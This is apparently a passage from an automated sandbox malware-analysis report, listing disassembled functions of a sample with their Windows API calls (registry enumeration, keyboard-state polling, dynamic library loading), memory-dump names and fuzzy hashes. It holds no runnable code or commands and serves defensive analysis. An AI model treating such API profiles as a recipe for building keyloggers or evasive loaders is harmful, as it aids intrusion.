Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
Instruction ID: c76d27196c22609b36ef43698f3ab7a098cbab9511b13d7d49821a683dda3950
Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
Instruction Fuzzy Hash: 8651D033A16A5189E711EB65E8807BCB7B0FB46B98F858235CE0E476ADDF38E041C710

Function 00007FF7A5240084 Relevance: 7.6, APIs: 5, Instructions: 141registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7A5241110: CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7A523FD7B), ref: 00007FF7A5241143

RegConnectRegistryW.ADVAPI32 ref: 00007FF7A5240189
RegOpenKeyExW.ADVAPI32 ref: 00007FF7A52401E6
RegEnumKeyExW.ADVAPI32 ref: 00007FF7A5240250
RegCloseKey.ADVAPI32 ref: 00007FF7A524028D
RegCloseKey.ADVAPI32 ref: 00007FF7A524029D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
Instruction ID: 01347a51d9bf357f5b05a32c8a8eabbe7c8fb0ef232bca67d2c2ba580adfa1fa
Opcode Fuzzy Hash: bd38130d0a6c74a4fb364d1ff2c50e7e9d7a3923237d5797147a29dace5ff8d3
Instruction Fuzzy Hash: 51619162A09A4285EB11EB65E8403FDB770FB86B84F824131DB4D076BACF7CD145C750

Function 00007FF7A523D0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A523C2BF), ref: 00007FF7A523D176
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A523C2BF), ref: 00007FF7A523D217
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A523C2BF), ref: 00007FF7A523D236
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A523C2BF), ref: 00007FF7A523D281
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7A523C2BF), ref: 00007FF7A523D2A0

Part of subcall function 00007FF7A51C4120: WideCharToMultiByte.KERNEL32 ref: 00007FF7A51C4160
Part of subcall function 00007FF7A51C4120: WideCharToMultiByte.KERNEL32 ref: 00007FF7A51C419C

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
Instruction ID: 8452b9c3ade31fef48e57e84064b44f507d3940c10ff515e4897e37f7a2b990c
Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
Instruction Fuzzy Hash: 39513C76B16B4685EB05EB56E8401BCA374FB9AF94B864432DF4E433A9DF78D441C320

Function 00007FF7A521670C Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00007FF7A521674B
VariantClear.OLEAUT32 ref: 00007FF7A52167C5
VariantClear.OLEAUT32 ref: 00007FF7A5216826
VariantClear.OLEAUT32 ref: 00007FF7A52168B4
VariantChangeType.OLEAUT32 ref: 00007FF7A52168E5

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
Instruction ID: b2b641171ac8dcccbed944a67dd11583393a66eb9af49cf8c9fd3d87a84a0eb3
Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
Instruction Fuzzy Hash: 57516773626A4592DB10DF15D8847AE73B4FB94F84F828122CB4D43BA8EF39E459C710

Function 00007FF7A51E2998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51E29E9

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
Instruction ID: 1317f76278bce502e3390225dd5c811c7539dc59371724f3cf4109ead7bf4470
Opcode Fuzzy Hash: 69caafc8f8afcb53c87a7f7053d9646584506dbe7d8e8e6cfd9f4db44817ad77
Instruction Fuzzy Hash: 8B51B26260A782C6E662AF11F490179F695EF82FA0F964235EE7D076F8DE3CE441C310

Function 00007FF7A52296A8 Relevance: 7.6, APIs: 5, Instructions: 128COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00007FF7A5229785
GetPrivateProfileSectionW.KERNEL32 ref: 00007FF7A52297BA
WritePrivateProfileSectionW.KERNEL32 ref: 00007FF7A522980F
WritePrivateProfileStringW.KERNEL32 ref: 00007FF7A5229836
WritePrivateProfileStringW.KERNEL32 ref: 00007FF7A5229848

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
Instruction ID: b8e2fb31b3daa9374f170919d301e4e8023e4995e62092c08c096da1aa74c5bf
Opcode Fuzzy Hash: 95fb2e0a0683671ba085f2766c906dafb1032fc97baa3117c4aba2321f0fd2dc
Instruction Fuzzy Hash: A7512B66A19A4682DB11EF26E48027DA760FB89F94F468432EF8E4777ACF3DD440C710

Function 00007FF7A51A1CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF7A51A1D1B
ScreenToClient.USER32 ref: 00007FF7A51A1D3A
GetAsyncKeyState.USER32 ref: 00007FF7A51A1D62
GetAsyncKeyState.USER32 ref: 00007FF7A51A1D82

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
Instruction ID: 94a085ae75049c48307bd429caa3cb98e718e1deed6b2243a1643c751fa1d058
Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
Instruction Fuzzy Hash: 58510376B0A6818BE759EF31E844579B760FB46B54F410231EF5A43BE9CF38E8518B10

Function 00007FF7A51DBA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7A51DBB4E

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
Instruction ID: 2c9088a0cd3713d84b18ad3507e95c9bcdb7bc4fca45c97dff063d67559d11d3
Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
Instruction Fuzzy Hash: 0841A763B0BA4241FA16AF06F880275E391BF56FA0F978535DD1E4B2ACDE3CE4008710

Function 00007FF7A524FF50 Relevance: 7.6, APIs: 5, Instructions: 109COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF7A524FFE7
EnableWindow.USER32 ref: 00007FF7A5250012
ShowWindow.USER32 ref: 00007FF7A525007C
ShowWindow.USER32 ref: 00007FF7A5250098
EnableWindow.USER32 ref: 00007FF7A52500C6

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$Show$Enable
String ID:
API String ID: 2939132127-0
Opcode ID: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
Instruction ID: 5602d701d4daa16307b254651041f9cc30176339917e87d6497a4777f19183de
Opcode Fuzzy Hash: c489c8d02495f69c1778672d4edb055e6fea3c7ece5ab9feb79cbeb3e5804fe0
Instruction Fuzzy Hash: 825183B6A0B686C1EB509B15DC447B8B7A0EB86F54FAA4035CA4D077F8DE3DE445C320

Function 00007FF7A520D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?,?,?,?,00007FF7A520D8F3), ref: 00007FF7A520D952
PostMessageW.USER32 ref: 00007FF7A520D9F2
Sleep.KERNEL32(?,?,?,?,?,00007FF7A520D8F3), ref: 00007FF7A520D9FA
PostMessageW.USER32 ref: 00007FF7A520DA0D
Sleep.KERNEL32(?,?,?,?,?,00007FF7A520D8F3), ref: 00007FF7A520DA15

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
Instruction ID: 7c2067324b3dccf52e2088b6e9baee0cf559e6d4027b735477050b860752e439
Opcode Fuzzy Hash: 53e5e18aae174657f43a3affddf2552eb5f4829ae1ffd7803c72ea05724a17bc
Instruction Fuzzy Hash: E331C67670A64587E714DF19E844269B3A1F789FA8F820135EE5E877E8CE3DEC418710

Function 00007FF7A5223824 Relevance: 7.6, APIs: 5, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00007FF7A5223889
TranslateAcceleratorW.USER32 ref: 00007FF7A52238E9
TranslateMessage.USER32 ref: 00007FF7A5223916
DispatchMessageW.USER32 ref: 00007FF7A5223921
PeekMessageW.USER32 ref: 00007FF7A5223938

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
Instruction ID: 073a3072ce34315bd8f8f4e63ab5af9c4741bd1750fa8c3bbd3ee9b929a5e8aa
Opcode Fuzzy Hash: c134d4337344e0b5e6f60fa6ff3406e13c81d8ed9a5a6472cdeb4b0526b89ef4
Instruction Fuzzy Hash: 874161A5D0F286C6FB70AB14AC887B9A690AF63F44F960035E54D456FCCE3DE4448721

Function 00007FF7A5211B34 Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00007FF7A5211B6A
SendMessageW.USER32 ref: 00007FF7A5211B93
SendMessageW.USER32 ref: 00007FF7A5211BD8
CharUpperBuffW.USER32 ref: 00007FF7A5211BFC
wcsstr.LIBVCRUNTIME ref: 00007FF7A5211C09

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindowwcsstr
String ID:
API String ID: 2655805287-0
Opcode ID: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
Instruction ID: 77756f7780284da98e024ad9ef01557e875f64573c4f358c0e9ca329cb3680c0
Opcode Fuzzy Hash: b5ab547c948b7cef08c9277144327c084d2ec7411446b628b916d0c489a33ceb
Instruction Fuzzy Hash: AA21C962B0B78245EB15EB12AD05179A690FF9AFE0F854530EE5D477F9DE3CD4408310

Function 00007FF7A51A2370 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32 ref: 00007FF7A51A23FF
SelectObject.GDI32 ref: 00007FF7A51A2412
BeginPath.GDI32 ref: 00007FF7A51A242B
SelectObject.GDI32 ref: 00007FF7A51A2452

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
Instruction ID: a817bccd62c31420244bb732d02db24d1bfda0ef09c33ade6079d46003a8b039
Opcode Fuzzy Hash: 8abe7a71c66bee896d504cb3d5ab816aa1492e552a9085df695a80683d63dbe3
Instruction Fuzzy Hash: 2C3170B191A745C6E741AB51A840379F7A0FB4AF90FC64139EA89437B8CF7DE841C720

Function 00007FF7A5232E64 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32 ref: 00007FF7A5232E96
GetForegroundWindow.USER32 ref: 00007FF7A5232EAF
GetDC.USER32 ref: 00007FF7A5232EF2
GetPixel.GDI32 ref: 00007FF7A5232F03
ReleaseDC.USER32 ref: 00007FF7A5232F3B

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
Instruction ID: 1867a8431302e492d5fe2d3e66f9e9efaa0f01def06c3fa25c556e8bb7e9b942
Opcode Fuzzy Hash: 0803af3d0555ee4f2e7cd4680bdbd11eb807c22797343ae4eaf726b5c3b1d4d7
Instruction Fuzzy Hash: ED219766B0A64186E708EF26E88407DE3A0FB8AF90B464035DE5D87BB9DF3DD4458750

Function 00007FF7A51D1F44 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51D1F68
CreateThread.KERNEL32 ref: 00007FF7A51D1FA9
GetLastError.KERNEL32 ref: 00007FF7A51D1FB7
CloseHandle.KERNEL32 ref: 00007FF7A51D1FD4
FreeLibrary.KERNEL32 ref: 00007FF7A51D1FE3

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: 5a03c1e74c727ad6943a6aafe1eddabbbd93acb60c7f9608f7f9e8f5502f6952
Instruction ID: e5e0fd5bdb5c1e999f725d006af53ffcbf8f8639532025e2d65ee1507f37e0b9
Opcode Fuzzy Hash: 5a03c1e74c727ad6943a6aafe1eddabbbd93acb60c7f9608f7f9e8f5502f6952
Instruction Fuzzy Hash: 79214127A0B78286EE16EB65F450179E2A0AF96F80F864531EA4D477ADDF2CE404C620

Function 00007FF7A51DF9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7A51DF9FB
_set_statfp.LIBCMT ref: 00007FF7A51DFA16
_set_statfp.LIBCMT ref: 00007FF7A51DFA32
_set_statfp.LIBCMT ref: 00007FF7A51DFA6E

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
Instruction ID: a7e0433e70d27380704a78aeb2d1d662385ab44a77a94cebd324e6a7ea44f327
Opcode Fuzzy Hash: e270cafaa1c1bb403facffb31b6a836e27aa4e45b093d38abbba4bbe7c8013ef
Instruction Fuzzy Hash: 5111E327E2F60305F6563128F44637590417F47BB0F8B4630EA6E466FE8F1CAB40C1A0

Function 00007FF7A51C5244 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

_set_fmode.LIBCMT ref: 00007FF7A51C525B
__scrt_initialize_onexit_tables.LIBCMT ref: 00007FF7A51C5274
_RTC_Initialize.LIBCMT ref: 00007FF7A51C527D

Part of subcall function 00007FF7A51C4F0C: _onexit.LIBCMT ref: 00007FF7A51C4F10

Part of subcall function 00007FF7A51DA09C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DA0C6

__scrt_fastfail.LIBCMT ref: 00007FF7A51C52F5
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FF7A51C5300

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Initialize__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_initialize_onexit_tables_invalid_parameter_noinfo_onexit_set_fmode
String ID:
API String ID: 2117695475-0
Opcode ID: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
Instruction ID: ff0ac82a7368e0f7db0af043d93d3ea0d6d6799535f298860617927fe7d3d510
Opcode Fuzzy Hash: c6240938d00ce931eff62a9f8efb7c75b2bc90d30c2bcb96158b33b23c092f9e
